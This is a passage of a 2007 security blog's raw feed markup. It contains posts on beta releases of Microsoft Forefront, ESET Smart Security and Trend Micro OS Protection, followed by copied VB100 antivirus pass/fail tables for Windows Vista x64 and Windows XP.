src='https://blogger.googleusercontent.com/tracker/1922987820881544907-5002190023916139417?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-84148360664964069202007-08-22T05:43:00.002-07:002007-08-22T05:46:26.861-07:00Microsoft Forefront Client SecurityI remember hearing about Forefront Client Security a while ago (maybe a few months) but then I never heard any news of it pop up again. So I did a little bit of searching and I noticed a beta version of it has been released.<br /><br />Basically, Forefront is an Anti-Virus and Anti-Spyware program meant for "business environments" It looks the EXACT same as Windows Defender, except this beta is newer than Defender:<br /><br />Microsoft Forefront Client Security<br />Client Version: 1.5.1933.0<br />Engine Version: 1.1.2204.0<br />Antivirus definition: 1.15.2240.1<br />Antispyware definition: 1.15.2240.1<br /><br />Windows Defender<br />Windows Defender Version: 1.1.1505.0<br />Engine Version: 1.1.2101.0<br />Definition Version: 1.15.2233.6<br /><br /><!--QuoteEnd--><!--QuoteEEnd-->(Also, Forefront doesnt have the ugly Blue > Green UI efender does, it has the old blue UI.)<br /><br />I only installed it yesterday, so i'm not sure how the Anti-Virus performs, but knowing MS... let's just say i'm keeping avast! by my side for now. The Anti-Spyware, well I can only assume it's working the same as Defender, if not better. And So far Windows Defender has been doing a great job.<br /><br />If you want to try it out, heres the link:<br /><a href="http://www.microsoft.com/forefront/clientsecurity/default.mspx" target="_blank">http://www.microsoft.com/forefront/clients...ty/default.mspx</a><br /><br />And heres the direct link to the Download:<br /><a href="http://www.microsoft.com/downloads/details.aspx?FamilyID=65c7116f-d238-463c-b3c7-e2627f210aee&DisplayLang=en" target="_blank">http://www.microsoft.com/downloads/details...;DisplayLang=en</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-8414836066496406920?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-28778609179221940532007-08-22T05:43:00.001-07:002007-08-22T05:43:20.190-07:00Eset Smart Security 3.0.128.0 Public Beta 1ESET Smart Security is a fully integrated security solution and includes antivirus, anti-spyware, a personal firewall and antispam. While some competitive solutions purport to have similar functionality, ESET has developed a unique approach that provides true and full integration of point security solutions. The key advantage of this approach is that individual protection modules are able to communicate together seamlessly, to create unparalleled synergy to improve the efficiency and effectiveness of protection. Moreover, the integrated architecture guarantees optimal utilization of system resources, so ESET Smart Security continues ESET’s well know reputation for providing rock solid security in a small footprint that will not slow down an individual’s computer.<br /><br /><b>What’s new</b><br />ESET Smart Security is a milestone in the field of computer protection against infiltrations and attacks. The program offers more than just a sum of its parts – it is synergy that matters most. If all components are used simultaneously, the effectiveness of the whole program is multiplied. ESET Smart Security unifies all its functions to create a complex security solution.<br /><br />ESET Smart Security is based on three basic pillars:<br /><br />ESET NOD32 Antivirus + Antispyware<br />This component is in fact an improved version of the award-winning scanning engine of NOD32 Antivirus v2.7.<br /><br />ESET Personal Firewall<br />Firewall monitors all traffic between a protected computer and other computers in the local network and in the Internet.<br /><br />ESET Anti Spam<br />ESET Anti Spam serves to filter unsolicited email, which makes your work with email more effective.<br /><br />download:<br /><br /><a href="http://download1.eset.com/special/essbeta/ess_nt32_enu.msi" target="_blank">http://download1.eset.com/special/essbeta/ess_nt32_enu.msi</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-2877860917922194053?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-82491381484049050852007-08-22T05:35:00.001-07:002007-08-22T05:37:10.085-07:00Trend Micro OS Protection Beta Released<span style="color: rgb(0, 128, 128);"><b>Trend Micro today released Trend Micro OS Protection beta for its Trend Micro Internet Security 2007 customers. OS protection includes Trend Micro Firewall Booster and Trend Micro Pre-Startup Scan. </b><!--colorc--></span><!--/colorc--><br /><br />Rather than rail against various kernel changes within Windows Vista as Symantec and other did last fall, Trend Micro says it wanted to work in cooperation with Microsoft. Trend Micro OS Protection works on both the 32-bit and 64-bit editions of Windows Vista.<br /><br />The chief benefit from Trend Micro Firewall Booster is Windows Vista users won't have dual firewall technologies running. Firewall Booster leverages existing Windows Vista Firewall capabilities, adding protection provided by Trend Micro. Trend Micro Pre-Startup Scan runs before Windows Vista boots, ferreting out sleeping malware such as rootkits before engaging the operating system. Pre-Startup includes a system restore checkpoint, so that a user can always roll back any changes made. The process is not automatic, allowing the user to decide when and how the scans will be done.<br /><br />Quick Scan takes only a few minutes and identifies rootkits and any browser-related malware. Full Scan performs a thorough scan all of the files on the system. While Full Scan can take up to a half hour to complete (all the while Windows Vista is not running), there is an option to shut down the system afterward so Full Scans can be run late at night.<br /><br />Trend Micro OS Protection beta is available in addition to the existing certified by Microsoft as Windows Vista compatible firewall protection within Trend Micro Internet Security 2007. OS Protection is designed for more advanced Trend Micro users who want a more powerful firewall and is not necessary for average Internet users. Available for download from the TrendSecure site, OS Protection is free of charge to existing Trend Micro Internet Security 2007 customers.<br /><br /><b>View:</b> <a href="http://www.trendsecure.com/portal/en-US/threat_analytics/os_protect.php?WT.cg_n=home_2nd_right" target="_blank">Trend Micro Beta Overview</a><br /><b>Source:</b> <a href="http://news.com.com/8301-10784_3-9733757-7.html?part=rss&subj=news&tag=2547-1_3-0-5" target="_blank">CNet</a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-8249138148404905085?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-17440904683317052052007-08-22T05:35:00.000-07:002007-08-22T05:36:57.432-07:00<span style="color: rgb(0, 128, 128);"><b></b></span><a href="http://news.com.com/8301-10784_3-9733757-7.html?part=rss&subj=news&tag=2547-1_3-0-5" target="_blank"><br /></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-1744090468331705205?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-83459375346781258632007-08-22T03:20:00.000-07:002007-08-22T03:21:02.987-07:00Windows Vista x64 - August 2007<h3>Alwil</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE9">Alwil</a><br /><i>Product name</i>: Alwil avast! Professional 4.7.1015</td> </tr></tbody></table> <h3>Bullguard</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE48">Bullguard</a><br /><i>Product name</i>: Bullguard v.7.0 x64</td> </tr></tbody></table> <h3>CA eTrust</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE39">CA eTrust</a><br /><i>Product name</i>: CA eTrust r.8.1.634.0</td> </tr></tbody></table> <h3>CAT QuickHeal</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE29">CAT QuickHeal</a><br /><i>Product name</i>: CAT Quick Heal 2007 v.9.00</td> </tr></tbody></table> <h3>Eset</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE14">Eset</a><br /><i>Product name</i>: ESET Nod32 Antivirus System v.2375</td> </tr></tbody></table> <h3>Fortinet</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE17">Fortinet</a><br /><i>Product name</i>: Fortinet FortiClient 3.0.458</td> </tr></tbody></table> <h3>GDATA</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE24">GDATA</a><br /><i>Product name</i>: G DATA AntiVirusKit 17.0.7171</td> </tr></tbody></table> <h3>Grisoft</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE10">Grisoft</a><br /><i>Product name</i>: Grisoft AVG Professional Edition 7.5.476 </td> </tr></tbody></table> <h3>Ikarus</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE27">Ikarus</a><br /><i>Product name</i>: Ikarus Virus Utilities 1.0.57</td> </tr></tbody></table> <h3>Kaspersky</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE15">Kaspersky</a><br /><i>Product name</i>: Kaspersky Anti-Virus 7.0.0.123</td> </tr></tbody></table> <h3>Kingsoft</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE45">Kingsoft</a><br /><i>Product name</i>: Kingsoft Internet Security 2007.6.21.206</td> </tr></tbody></table> <h3>McAfee</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE2">McAfee</a><br /><i>Product name</i>: McAfee VirusScan Enterprise v.8.5I</td> </tr></tbody></table> <h3>Microsoft Forefront</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE52">Microsoft Forefront</a><br /><i>Product name</i>: Microsoft Forefront Client Security 1.5.1937.0</td> </tr></tbody></table> <h3>MicroWorld</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE33">MicroWorld</a><br /><i>Product name</i>: Microworld eScan Internet Security for Windows 9.0.722.1</td> </tr></tbody></table> <h3>Sophos</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE1">Sophos</a><br /><i>Product name</i>: Sophos Anti-Virus 7.0.0</td> </tr></tbody></table> <h3>Symantec</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE4">Symantec</a><br /><i>Product name</i>: Symantec AntiVirus 10.2.0.298</td> </tr></tbody></table> <h3>Trend Micro</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE3">Trend Micro</a><br /><i>Product name</i>: Trend Micro PC-cillin Internet Security 2007 15.30.1239</td> </tr></tbody></table> <h3>VirusBuster</h3> <table class="layout"><tbody><tr><td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE20">VirusBuster</a><br /><i>Product name</i>: VirusBuster VirusBuster Professional 6.0</td></tr></tbody></table><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1922987820881544907-8345937534678125863?l=blazecompany.blogspot.com' alt='' /></div>Blaze Company - Edwinhttp://www.blogger.com/profile/14262650963282233192noreply@blogger.com0tag:blogger.com,1999:blog-1922987820881544907.post-49614250719675725862007-08-22T03:19:00.000-07:002007-08-22T03:20:38.834-07:00VB100 : Windows XP - June 2007<h3>AEC (Trustport)</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE42">AEC (Trustport)</a><br /><i>Product name</i>: AEC Trustport Workstation Antivirus 2.5.0.970</td> </tr></tbody></table> <h3>Agnitum</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE47">Agnitum</a><br /><i>Product name</i>: Agnitum Outpost Security Suite Pro 2007 5.1214.616</td> </tr></tbody></table> <h3>AhnLab</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE32">AhnLab</a><br /><i>Product name</i>: Ahnlab V3 Internet Security 2007 7.40.1</td> </tr></tbody></table> <h3>Alwil</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE9">Alwil</a><br /><i>Product name</i>: Alwil avast! v.4.7 Professional Edition </td> </tr></tbody></table> <h3>Authentium</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE21">Authentium</a><br /><i>Product name</i>: Authentium Command AntiVirus for Windows 4.94.5</td> </tr></tbody></table> <h3>Avira</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE37">Avira</a><br /><i>Product name</i>: Avira AntiVir </td> </tr></tbody></table> <h3>Bullguard</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE48">Bullguard</a><br /><i>Product name</i>: Bullguard v.7.0</td> </tr></tbody></table> <h3>CA Home</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE46">CA Home</a><br /><i>Product name</i>: CA AntiVirus 8.4.0.11</td> </tr></tbody></table> <h3>CA eTrust</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE39">CA eTrust</a><br /><i>Product name</i>: CA eTrust r.8.1.634.0</td> </tr></tbody></table> <h3>CAT QuickHeal</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE29">CAT QuickHeal</a><br /><i>Product name</i>: CAT Quick Heal 2007 v.9</td> </tr></tbody></table> <h3>Doctor Web</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE5">Doctor Web</a><br /><i>Product name</i>: Doctor Web Dr.Web 4.33.3.04230</td> </tr></tbody></table> <h3>eEye</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE49">eEye</a><br /><i>Product name</i>: eEye Blink Personal Edition 3.0.9</td> </tr></tbody></table> <h3>Eset</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE14">Eset</a><br /><i>Product name</i>: ESET Nod32 Antivirus System 2.70.32</td> </tr></tbody></table> <h3>Fortinet</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE17">Fortinet</a><br /><i>Product name</i>: Fortinet Forticlient 3.0.412</td> </tr></tbody></table> <h3>FRISK</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE8">FRISK</a><br /><i>Product name</i>: Frisk F-Prot Anti-Virus 6.0.70</td> </tr></tbody></table> <h3>F-Secure</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE23">F-Secure</a><br /><i>Product name</i>: F-Secure Protection Service for Consumers 7.00</td> </tr></tbody></table> <h3>GDATA</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb100logo.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(0, 99, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:white;"><b> PASS </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE24">GDATA</a><br /><i>Product name</i>: Gdata AntiVirusKit 17.0.7089</td> </tr></tbody></table> <h3>Grisoft</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE10">Grisoft</a><br /><i>Product name</i>: Grisoft AVG 7.5 Professional Edition</td> </tr></tbody></table> <h3>Ikarus</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;"><span style="color:black;"><b> FAIL </b></span></span><br /><i>Result history</i>: <a href="http://www.virusbtn.com/vb100/archive/results?vendor=VE27">Ikarus</a><br /><i>Product name</i>: Ikarus Virus Utilities 1.0.52</td> </tr></tbody></table> <h3>iolo</h3> <table class="layout"><tbody><tr> <td style="width: 10px; padding-right: 20px;" valign="middle"><img src="http://www.virusbtn.com/images/vb_fail_small.gif" /></td> <td valign="middle"> <i>Status</i>: <span style="background: rgb(206, 49, 49) none repeat scroll 0% 50%; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: 